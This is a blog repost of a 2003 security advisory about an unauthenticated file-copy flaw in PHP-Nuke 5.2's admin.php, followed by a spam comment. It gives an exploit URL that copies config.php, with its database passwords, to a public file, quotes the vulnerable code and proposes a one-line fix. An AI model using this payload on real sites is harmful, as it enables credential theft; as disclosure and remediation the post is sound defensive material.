« Shopper CGI BUG
Keamanan Jaringan Linux »

Security Vulnerability in PHP-Nuke Allows File Copying (admin.php)

Published January 27, 2003 Exploit , Hacking/Cracking , Programming Comment 
Security Vulnerability in PHP-Nuke Allows File Copying (admin.php)

Vulnerable systems:
PHP-Nuke 5.2 and prior

Immune systems:
PHP-Nuke 5.0 RC1 (only this one)

Exploit:
First run the following URL:
http://www.example.net/admin.php?upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfile=config.php&userfile_name=hacked.txt
(NOTE: URL wrapped for readability)

Then access the created file:
http://www.example.net/images/hacked.txt

And you will see config.php that contains the DB passwords. Any other file can be copied just as easily.

Vulnerable code:
The admin.php contains this routine:

$basedir = dirname($SCRIPT_FILENAME);
$textrows = 20;
$textcols = 85;
$udir = dirname($PHP_SELF);
if(!$wdir) $wdir="/";
if($cancel) $op="FileManager";
if($upload) {
    copy($userfile,$basedir.$wdir.$userfile_name);
    $lastaction = ""._UPLOADED." $userfile_name --> $wdir";
    // This need a rewrite -------------------------------------> OMG! WE AGREEEEEEEE lmao
    //include("header.php");
    //GraphicAdmin($hlpfile);
    //html_header();
    //displaydir();
    $wdir2="/";
    chdir($basedir . $wdir2);
    //CloseTable();
    //include("footer.php");
    Header("Location: admin.php?op=FileManager");
    exit;
}

That does not do a check to see if you are logged as admin or not, so you can use it without any authentication.

Solution:
A temporary solution would be to change:
"if($upload) {"

To

"if (($upload) && ($admintest)) {"

1 Response to “Security Vulnerability in PHP-Nuke Allows File Copying (admin.php)”

Feed for this Entry Trackback Address
  1. 1 Hale Mauricio September 19, 2007 at 6:39 pm

    damn all these beautiful gir. Hale Mauricio.

    Reply

Leave a Reply

« Shopper CGI BUG
Keamanan Jaringan Linux »

a

Blog Stats

  • 19,653 hits